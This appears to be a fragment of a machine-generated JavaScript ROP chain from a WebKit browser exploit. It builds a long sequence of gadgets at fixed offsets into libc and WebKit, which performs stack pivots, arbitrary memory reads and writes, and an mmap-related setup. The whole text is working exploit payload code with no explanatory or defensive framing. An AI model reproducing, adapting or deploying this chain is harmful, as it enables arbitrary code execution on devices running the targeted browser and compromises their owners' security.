set_gadget(libc_base+764760,); //pop rsi
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+1438842, //pop rdx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+3236123, //pop r9
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+756281, //xor rax, rax
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+782311, //pop rsp
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967080, 4294967295]); // -0xd8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([200, 0]); // 0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967088, 4294967295]); // -0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([192, 0]); // 0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967096, 4294967295]); // -0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([184, 0]); // 0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967104, 4294967295]); // -0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([176, 0]); // 0xb0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967112, 4294967295]); // -0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([168, 0]); // 0xa8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
webkit_base+14664103, //and rax, rcx
libc_base+763368, //pop rcx
mmap_addr,
webkit_base+20307877, //mov [rax], rcx
libc_base+764760 //pop rsi
]);
db([4294967192, 4294967295]); // -0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([128, 0]); // 0x80
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+161656, //L2349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+782311 //pop rsp
]);
//L2349:
db([0, 0]); // 0x0
//__out_buffer:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+161728, //L2351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2351:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+161824, //L2352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+161856, //L2355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2352:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2354:
db([32, 0]); // 0x20
set_gadget(webkit_base+568675,); //pop r8
//L2355:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+161960, //L2358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+161944, //L2356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2356:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+162104, //L2361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+162072, //L2359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+162088, //L2360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2359:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2360:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2361:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+162184, //L2362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2364:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+162304, //L2367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+162288, //L2365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2365:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2367:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+162416, //L2368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+162448, //L2370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+162432, //L2369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2368:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2369:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2370:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+162624, //L2372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+162640, //L2373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+162608, //L2371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2371:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2372:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2373:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+162752, //L2375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+162800, //L2378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+162768, //L2376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2375:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2376:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2377:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2378:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+162912, //L2379+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+162904, //L2379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2379:
db([0, 0]); // 0x0
set_gadgets([
ropchain+162928, //L2379+24
ropchain+165496, //L2374
libc_base+764760, //pop rsi
ropchain+162968, //L2380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2380:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2382:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+163088, //L2385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+163072, //L2383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2383:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2385:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+163248, //L2389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+163216, //L2387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+163232, //L2388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2386:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2387:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2388:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2389:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+163304, //L2391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2391:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+163432, //L2393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+163448, //L2394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+163416, //L2392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2392:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2393:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2394:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+163608, //L2398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+163576, //L2396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+163592, //L2397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2395:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2396:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2397:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2398:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+163664, //L2400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2400:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+163792, //L2402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+163808, //L2403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+163776, //L2401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2401:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2403:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+163888, //L2404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+163904, //L2405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2405:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+164064, //L2409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+164032, //L2407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+164048, //L2408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2406:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2407:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2408:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2409:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+164120, //L2411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2411:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+164248, //L2413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+164264, //L2414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+164232, //L2412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2412:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2413:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2414:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+164360, //L2416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+164344, //L2415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2415:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2416:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+164440, //L2417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2417:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2419:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+164560, //L2422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+164544, //L2420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2420:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2422:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+164704, //L2425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+164672, //L2423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+164688, //L2424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2423:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2424:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2425:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+164776, //L2427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2427:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+164832, //L2428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2428:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+164912, //L2430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2430:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2432:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+165032, //L2435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+165016, //L2433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2433:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2435:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+165144, //L2436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+165176, //L2438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+165160, //L2437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2436:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2437:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2438:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+165264, //L2440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2440:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+165320, //L2441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2441:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165392, //L2444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2444:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+165448, //L2445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2445:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L2374:
libc_base+764760, //pop rsi
ropchain+165576, //L2448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+165560, //L2447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2447:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2448:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165680, //L2449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+165696, //L2450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2449:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2450:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165816, //L2451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+165800, //L2452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2452:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2451:
db([0, 0]); // 0x0
//__out_null:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165888, //L2454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2454:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+165984, //L2455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166016, //L2458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2455:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2457:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L2458:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+166120, //L2461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166104, //L2459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2459:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2461:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+166280, //L2465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166248, //L2463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+166264, //L2464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
